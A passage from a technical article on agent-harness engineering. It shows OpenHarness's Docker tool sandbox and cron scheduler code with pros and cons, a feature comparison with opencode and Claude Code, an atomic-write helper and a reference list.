def run_tool_in_container(cmd: list[str], workdir: str, timeout: int = 60):
    client = docker.from_env()
    try:
        # With detach=False, containers.run returns the container's logs as bytes
        output = client.containers.run(
            "python:3.12-slim", cmd,
            volumes={workdir: {"bind": "/work", "mode": "rw"}},
            working_dir="/work",
            mem_limit="512m",
            network_disabled=True,  # no egress
            remove=True,            # auto-cleanup
            detach=False, stdout=True, stderr=True,
        )
        return output.decode("utf-8", errors="replace")
    except docker.errors.ContainerError as e:
        return f"[exit {e.exit_status}]: {e.stderr.decode()}"

# Fallback if Docker is missing
def run_tool(cmd: list[str], workdir: str):
    if docker_available():
        return run_tool_in_container(cmd, workdir)
    return subprocess.run(cmd, cwd=workdir, capture_output=True, text=True)
```
Pros
- Blast radius limited to the container → the host stays safe
- Resource limits (mem/cpu/network) block DoS
- Reproducible env (pinned image versions)
- Optional — Docker isn't forced on users who lack it
Cons
- Requires a Docker daemon — excludes some users (small VMs, restricted CI)
- Container startup overhead (~1s) per session
- The /workspace bind mount is rw — if an attacker escapes the container, the host dir is still exposed
- The openharness/sandbox:latest image must be built & published → supply-chain risk
T30. Cron scheduler + persistent background tasks
G.4 · src/openharness/tasks/manager.py · src/openharness/services/cron_scheduler.py · Storage: ~/.openharness/cron/registry.json + cron_history.jsonl · Tick: 30s

Code from OpenHarness:
```python
import asyncio, json
from dataclasses import asdict, dataclass
from datetime import datetime
from pathlib import Path
from typing import Awaitable, Callable
from croniter import croniter

@dataclass
class CronJob:
    job_id: str
    name: str
    cron_expr: str   # "*/30 * * * *"
    prompt: str      # agent prompt when the job fires
    enabled: bool = True
    last_run: str | None = None
    next_run: str | None = None

class CronScheduler:
    TICK = 30  # seconds

    def __init__(self, registry_path: Path, history_path: Path):
        self.registry_path = registry_path
        self.history_path = history_path
        self.jobs: dict[str, CronJob] = self._load()

    def _load(self) -> dict[str, CronJob]:
        if not self.registry_path.exists():
            return {}
        data = json.loads(self.registry_path.read_text())
        return {j["job_id"]: CronJob(**j) for j in data}

    def _save(self):
        self.registry_path.write_text(json.dumps(
            [asdict(j) for j in self.jobs.values()], indent=2,
        ))

    async def run_forever(self, on_fire: Callable[[CronJob], Awaitable]):
        while True:
            now = datetime.utcnow()
            for job in list(self.jobs.values()):
                if not job.enabled:
                    continue
                base = datetime.fromisoformat(job.last_run) if job.last_run else now
                itr = croniter(job.cron_expr, base)
                if itr.get_next(datetime) <= now:
                    asyncio.create_task(self._fire(job, on_fire))
                    job.last_run = now.isoformat()
                    self._save()
            await asyncio.sleep(self.TICK)

    async def _fire(self, job: CronJob, on_fire):
        try:
            result = await on_fire(job)
            self._append_history({"job_id": job.job_id,
                                  "fired_at": datetime.utcnow().isoformat(),
                                  "ok": True,
                                  "result_preview": result[:500]})
        except Exception as e:
            self._append_history({"job_id": job.job_id, "ok": False,
                                  "error": str(e)})

    def _append_history(self, entry: dict):
        with self.history_path.open("a") as f:
            f.write(json.dumps(entry) + "\n")
```

Code example (generic):
```python
import asyncio
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from apscheduler.triggers.cron import CronTrigger

async def agent_job(prompt: str):
    response = await run_agent(prompt)
    save_history(prompt, response)

async def main():
    scheduler = AsyncIOScheduler()
    # Cron: Mon-Fri 09:00
    scheduler.add_job(
        agent_job,
        trigger=CronTrigger.from_crontab("0 9 * * 1-5"),
        args=["Summarize overnight alerts"],
        id="daily-triage",
        replace_existing=True,
    )
    scheduler.start()
    await asyncio.Event().wait()  # run forever
```
Pros
- Turns the agent into a proactive assistant — no user ping required
- Persists across restarts → reliability
- History log for audit + debugging
- Per-job enable/disable makes maintenance pauses easy
Cons
- The 30s tick misses cron schedules finer than 30s
- Not distributed — multiple instances will fire duplicates
- The JSON registry isn't concurrent-safe (a write-via-rename step is still needed)
- Failure recovery depends on someone reading the history — no automatic alerting
Conclusion — OpenHarness vs. opencode vs. Claude Code
After 30 techniques, it is clear that OpenHarness is not just a "Python port of Claude Code". It is a superset in automation capability, trading some CLI-surface elegance to grow into an agent organization platform — one where agents can live in independent subprocesses, listen on N channels, run on cron, and stay isolated in Docker.
Three axes of comparison
| Aspect | Claude Code (TS, closed-source) | opencode (sst/anomalyco, TS) | HKUDS/OpenHarness (Python) |
|---|---|---|---|
| Language | TypeScript + Bun | TypeScript + Bun + Effect-TS | Python 3.10+ + asyncio |
| TUI | React Ink | React Ink | Rich/Textual + React Ink (dual) |
| Agent loop | ReAct async | ReAct async | ReAct async, single/parallel branching |
| Compaction | Auto-compact | Tail-preserving + template | Proactive + reactive + PTL retry |
| Sub-agent | Task tool in-session | Task tool in-session | Subprocess + worktree + mailbox |
| Permission | 3-mode + hook | Wildcard + arity + state | 3-mode + 6-layer + sensitive path |
| Memory | CLAUDE.md | CLAUDE.md | Per-project dir + MEMORY.md + search |
| Hooks | 6 events × 2 types | Hook + Tool Hook | 6 events × 4 types + hot reload |
| Skills | Markdown + frontmatter | Prompt + tool filter | Markdown + frontmatter + plugin |
| MCP | stdio + HTTP | stdio + HTTP | stdio + HTTP + dynamic Pydantic |
| Channels | CLI only | CLI only | Slack/Feishu/Discord/Telegram/Matrix |
| Autopilot | N/A | N/A | Dashboard + repo automation |
| Sandbox | N/A | N/A | Docker optional |
| Cron | N/A | N/A | Persistent scheduler (30s tick) |
| LSP | N/A | N/A | AST-based built-in |
When to choose OpenHarness
- Your team knows Python and wants to fork/customize deeply (no lock-in to the JS ecosystem)
- Your workflow needs long-running agents (Slack bots, cron triage, CI auto-fix)
- You want real multi-agent coordination (leader + workers + branch isolation via worktrees)
- You need a Docker sandbox for tool execution (compliance / security)
- You want structured persistent memory (per-project MEMORY.md, searchable through the CJK tokenizer)
When opencode or Claude Code fits better
- You only need a plain pair-programming CLI → opencode or Claude Code is simpler
- Your workflow is monolithic, one agent per session — swarm + channels become dead weight
- Your team is all-TS → forking/contributing is easier in opencode
Harness engineering lessons
OpenHarness demonstrates that scaffolding matters no less than the model. Three principles recur throughout the code:
- Atomic write — every state-changing file goes through write(.tmp) → rename (mailbox, registry, permission sync), avoiding partial-read races.
- Layered evaluation — 6 permission layers, 2-phase compaction (proactive + reactive + PTL retry), a 9-section prompt. Each layer has a distinct job, which keeps the system easy to reason about.
- Structured observability — streaming events with union types + 9-phase progress, JSONL history, pre/post hooks → the agent can be debugged from logs, with no manual reproduction.
If you build your own harness, five ideas worth copying from OpenHarness right away: (1) the per-project memory hash, (2) the CJK-aware tokenizer, (3) the hardcoded sensitive-path block, (4) subprocess + mailbox for subagents, (5) dual-channel permission sync. These details are easy to overlook if you only look at the "agent loop" at a high level, but they determine whether a harness can run 24/7 in production.
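The atomic-write principle can be packaged as a single shared helper — a generic sketch (not OpenHarness's exact code) that any of the mailbox/registry/permission writers could reuse:

```python
import json
import os
import tempfile
from pathlib import Path

def atomic_write_json(path: Path, data: dict) -> None:
    """Write to a temp file in the same directory, then rename over the target.

    os.replace() is atomic on POSIX (and on Windows for same-volume paths),
    so readers never observe a partially written file.
    """
    fd, tmp = tempfile.mkstemp(dir=path.parent, suffix=".tmp")
    try:
        with os.fdopen(fd, "w") as f:
            json.dump(data, f, ensure_ascii=False)
            f.flush()
            os.fsync(f.fileno())  # ensure bytes hit disk before the rename
        os.replace(tmp, path)
    except BaseException:
        os.unlink(tmp)  # clean up the temp file on any failure
        raise
```

The temp file must live in the same directory as the target: rename is only atomic within a single filesystem, and a cross-device rename silently degrades to copy + delete.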
References
Repo & source code
- HKUDS/OpenHarness — main repo
- HKUDS/OpenHarness — SHOWCASE
- HKUDS/ClawTeam — integration partner
- Awesome Harness Engineering
Harness engineering
- Martin Fowler — Harness engineering for coding agent users
- HumanLayer — Skill Issue: Harness Engineering for Coding Agents
- OpenAI — Harness engineering
- Avi Chawla — The Anatomy of an Agent Harness
Context, compaction & memory
- Microsoft Learn — Compaction
- JetBrains Research — Smarter Context Management
- Factory.ai — Compressing Context
- Morph — Compaction vs Summarization
- arXiv — Solving Context Window Overflow in AI Agents
Tool design & safety
MCP & plugins
- MCP — official spec
- MCP Python SDK
- Claude Code — Hooks
- Claude Code — Plugins
- Claude Code — Configure permissions
Multi-agent & swarm
- Anthropic — Multi-agent research system
- Google ADK — Multi-agent systems
- LangChain — Multi-agent docs
- OpenAI Swarm — Research
- AWS — Agents as Tools Pattern
Git worktree & IPC
- git-worktree docs
- Atlassian — Git Worktree Beginner Guide
- Shopify — Managing multiple branches with worktree
- EIP — Messaging Mailbox
Channels & LSP
- Slack Bolt Python SDK
- Feishu OAPI (lark-oapi)
- python-telegram-bot docs
- discord.py docs
- Microsoft LSP spec
- Python ast module docs
Sandbox & cron
- Docker Python SDK
- OWASP — Container Security Verification
- gVisor — Application kernel sandbox
- python-croniter
- APScheduler